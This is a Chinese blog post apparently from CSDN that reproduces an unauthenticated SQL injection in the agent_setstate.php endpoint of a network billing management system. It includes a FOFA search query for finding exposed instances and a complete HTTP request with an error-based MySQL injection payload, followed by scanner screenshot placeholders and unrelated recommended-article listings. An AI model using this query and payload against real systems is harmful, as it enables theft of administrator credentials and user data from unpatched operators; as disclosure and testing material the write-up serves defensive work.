【漏洞复现】蓝海卓越计费管理系统 agent_setstate.php SQL注入漏洞

已于 2024-05-24 21:04:56 修改
阅读量277 收藏 4
点赞数 12
分类专栏: 漏洞复现篇 文章标签: sql 蓝海卓越
于 2024-05-24 21:03:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/139184285
版权

0x01 产品简介

蓝海卓越计费管理系统是一套以实现网络运营为基础,增强全局安全为中心,提高管理效率为目的的网络安全运营管理系统,提供"高安全、可运营、易管理”的运营管理体验,基于标准的RADIUS协议开发,它不仅支持PPPOE和WEB认证计费,还支持802.1X接入控制技术,与其他厂商支持相应标准的产品兼容,结合蓝海卓越的PPPOE服务器网关,可提供更加丰富的功能。,另外,友好的Web访问管理的方式,为用户提供更好用、易用的方式,更贴心的使用形式。

0x02 漏洞概述

蓝海卓越计费管理系统 agent_setstate.php 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

0x03 搜索语法

FOFA:  title=="蓝海卓越计费管理系统"

在这里插入图片描述

0x04 漏洞复现

GET /agent_setstate.php?id=(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT(0x717a767071,(SELECT%20(ELT(6154=6154,1))),0x7170716a71,0x78))s),%208446744073709551610,%208446744073709551610))) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: application/x-www-form-urlencoded
Connection: close

在这里插入图片描述
sqlmap验证
在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

SuperherRo
关注
  • 12
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Python对象序列化与反序列化的魔法方法(__getstate__()和__setstate__())
herosunly的博客
04-06 7485
1. 前言 2. 对序列化进行修改 2.1 对其中已有属性进行修改 2.2 添加新的属性 3. 对反序列进行修改 3.1 在__setstate__()中对__dict__属性进行修改 3.2 在__setstate__()中没有语句对__dict__属性进行修改 4. 对序列化与反序列化都进行修改 4.1 正常修改 4.2 结果形成嵌套结构 4.3 添加新属性
06-react-setState.md
03-31
大厂前端面试题目|# 开始 遇到一个需求、问题或者一段代码,如何能高效的分析、解决它,这是前端程序员的必备技能。否则你将无法独立工作,这不是企业需要的人才。本章将通过多个面试题,教你如何分析问题、解决问题。 ## 为何要考察 遇到一个需求、问题或者一段代码,如何能高效的分析、解决它,这是前端程序员的必备技能。 否则你将无法独立工作,这不是企业需要的人才。 ## 考察重点 能看懂代码的逻辑,识破代码的一些坑。 ## 注意事项 暂无 ## 看几个问题 参考视频。
Python 使用 __getstate__ 和 __setstate__ 魔法方法
热门推荐
jianghuixin
11-13 1万+
2021-03-21 更新 __getstate__ 与 __setstate__ 两个魔法方法分别用于Python 对象的序列化与反序列化 在序列化时, _getstate__ 可以指定将那些信息记录下来, 而 __setstate__ 指明如何利用已记录的信息
蓝海卓越计费管理系统 agent_setstate.php SQL注入漏洞复现
0xSec
05-24 589
蓝海卓越计费管理系统 agent_setstate.php 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
TypeError: react__WEBPACK_IMPORTED_MODULE_0___default.a.createClass is not a function
游海东的技术专栏
05-24 1万+
1、错误描述 2、错误原因 import React, {Component} from 'react'; import {render} from 'react-dom'; import Button from 'react-bootstrap/Button'; var TickTock = React.createClass({ mixins: [SetIntervalMi...
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 739
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
前端大厂最新面试题-setState.docx
06-06
React中的setState执行机制详解 在 React 中,setState 是一个非常重要的方法,它用于更新组件的状态从而引发视图的更新。在本文中,我们将深入探讨 setState 的执行机制,并分析其异步更新和同步更新的差异。 一...
前端大厂最新面试题-state_props.docx
06-06
* Props 是外部传递给组件的,而 State 是在组件内被组件自己管理的,一般在 constructor 中初始化 * Props 在组件内部是不可修改的,但 State 在组件内部可以进行修改 * State 是多变的、可以修改 State 和 Props ...
浅谈使用React.setState需要注意的三点
08-28
浅谈使用React.setState需要注意的三点 在 React 中,使用 setState 是一件很复杂的事情,即使是熟练的 React 开发,也很有可能因为 React 的一些机制而产生一些 bug。因此,在使用 setState 时需要注意三个问题: ...
react配合antd组件实现的管理系统示例代码
08-27
React 配合 Antd 组件实现的管理系统示例代码 这篇文章主要介绍了使用 React 配合 Antd 组件实现的管理系统示例代码,涵盖了 React、Redux、Antd、Webpack 等技术栈。下面是从这篇文章中提炼出来的知识点: 一、...
python魔术方法之__setstate__和__getstate__
weixin_43580966的博客
03-25 2188
python语法之魔法方法
SQL注入-sqlmap使用
Varin
06-20 985
sqlmap是一款自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB
MyBatis-Plus 查询不到数据,但使用 SQL 可以查询到数据的问题排查
weixin_74268571的博客
06-22 908
MyBatis-Plus 查询不到数据,但使用 SQL 可以查询到数据的问题详细排查和解决方案
查询SQL 人大金仓 与MySQL的区别
yaoyulan21的博客
06-20 278
【代码】【无标题】
PostgreSQL进阶教程
power_9的博客
06-19 583
事务是一个或多个SQL语句的组合,这些语句作为一个单元执行,要么全部成功要么全部失败。事务的使用方式如下: 事务隔离级别 PostgreSQL支持四种事务隔离级别:设置事务隔离级别: 锁 PostgreSQL支持多种锁,以控制并发访问:示例: 高级查询 联合查询 联合查询使用操作符合并多个查询结果集: 窗口函数 窗口函数在结果集中执行计算,并保留原始行: 子查询 子查询是嵌套在另一个查询中的查询: CTE(公用表表达式) CTE是一种在查询中定义临时结果集的方式: 数据类型 自定义数据类型 PostgreS
【Redis一】Redis配置与优化
最新发布
F12138X的博客
06-26 545
你觉得,迷茫的反义词是什么?有些人可能会说是坚定,但还有另一种说法:迷茫的反义词是具体。当你从一件件具体的事开始着手,焦虑就会一点点退去
【Python】已解决:pymssql引发的MSSQLDatabaseException错误
屿小夏.的知识博客
06-23 362
在Python中使用pymssql库与Microsoft SQL Server数据库交互时,有时会遇到pymssql._mssql.MSSQLDatabaseException错误。在上面的代码中,如果数据库表my_table中没有名为‘review’的列,执行查询时就会抛出MSSQLDatabaseException异常。在这个修正后的示例中,我们假设正确的列名是‘reviews’,并且已经用它替换了错误的列名‘review’。这个错误最常见的原因是SQL查询中引用了一个在数据库表中不存在的列名。
PostgreSQL 基本SQL语法(二)
技术学习与分享
06-25 405
子句用于过滤数据,仅返回满足条件的记录。语句用于从数据库中检索数据。语句用于向表中插入数据。语句用于更新表中的数据。语句用于从表中删除数据。
def __getstate__(self): # 在pickle之前拷贝类字典,然后删除pool值,最后返回 self_dict = self.__dict__.copy() del self_dict['pool'] return self_dict def __setstate__(self, state): # 在pickle之后将其更新 self.__dict__.update(state)
07-15
你的 `__getstate__()` 和 `__setstate__()` 方法看起来是正确的。在 `__getstate__()` 方法中,你创建了一个副本 `self_dict`,删除了 `self_dict` 中的 `'pool'` 键,并返回了剩余的字典。而在 `__setstate__()` 方法中,你使用传入的状态字典 `state` 来更新对象的字典。 这样的实现应该能够解决你遇到的 `PicklingError` 错误。通过删除 `'pool'` 键,你确保了 `AppBase.AliyunBase_android` 类的实例在被序列化时不会包含 `'pool'` 属性。 请确保在使用 `multiprocessing.Queue()` 传递类之前,已经正确地实现了 `__getstate__()` 和 `__setstate__()` 方法,并且类定义可被 pickle 库找到。如果问题仍然存在,请提供更多的代码和错误信息,以便我能够更好地帮助你解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值